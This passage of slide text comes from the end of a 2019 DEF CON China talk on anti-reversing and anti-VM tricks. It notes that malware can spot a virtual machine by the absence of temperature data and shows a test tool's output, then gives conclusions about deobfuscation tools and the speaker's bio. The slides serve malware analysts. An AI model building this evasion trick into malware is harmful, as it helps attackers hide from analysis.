ALEXANDREBORGES–MALWAREANDSECURITYRESEARCHER
There is not support for acquiring temperature
data in virtual machines.
Therefore, malwares are able to know whether
they are running on virtual machines or not.
Physical Host:
C:> VM_Test2.exe
Status: OK Thus, the program is running
in a physical host!
Virtual Machine:
C:> VM_Test2.exe
This program IS RUNNING in a virtual machine!
117. DEF CON CHINA 1.0 (2019) 117
ALEXANDREBORGES–MALWAREANDSECURITYRESEARCHER
FEW CONCLUSIONS:
Before trying to unpack modern protectors, it is really necessary to
understand the common anti-reversing techniques.
MIASM, METASM and TRITON are amazing tools to handle and
deobfuscate complex codes.
Emulation is an possible alternative to understand small and
complicated piece of codes.
DTrace has done an excellent job on Solaris and it may be an excellent
tool on Windows operating system. Stay tuned.
Although excellent researches have found sophisticated anti-vm
techniques, many other simples and smart ones exist. Take care.
118. DEF CON CHINA 1.0 (2019) 118
ALEXANDREBORGES–MALWAREANDSECURITYRESEARCHER
Acknowledgments to:
DEF CON’s staff, who have been always very kind with
me.
You, who reserved some time to attend my talk.
Remember: the best of this life are people.
119. DEF CON CHINA 1.0 (2019)
119
ALEXANDREBORGES–ITISNOTALLOWEDTOCOPYORREPRODUCETHISSLIDE.
Malware and Security Researcher.
Speaker at DEFCON USA 2018
Speaker at HITB2019 Amsterdam
Speaker at CONFidence Conf. 2019
Speaker at BSIDES 2018/2017/2016
Speaker at H2HC 2016/2015
Speaker at BHACK 2018
Consultant, Instructor and Speaker
on Malware Analysis, Memory
Analysis, Digital Forensics and
Rookits.
Reviewer member of the The
Journal of Digital Forensics,
Security and Law.
Referee on Digital Investigation:
The International Journal of Digital
Forensics & Incident Response
THANK YOU FOR
ATTENDING MY TALK.
謝謝
Twitter:
@ale_sp_brazil
@blackstormsecbr
Website: http://blackstormsecurity.com
LinkedIn:
http://www.linkedin.com/in/aleborges
E-mail:
alexandreborges@blackstormsecurity.com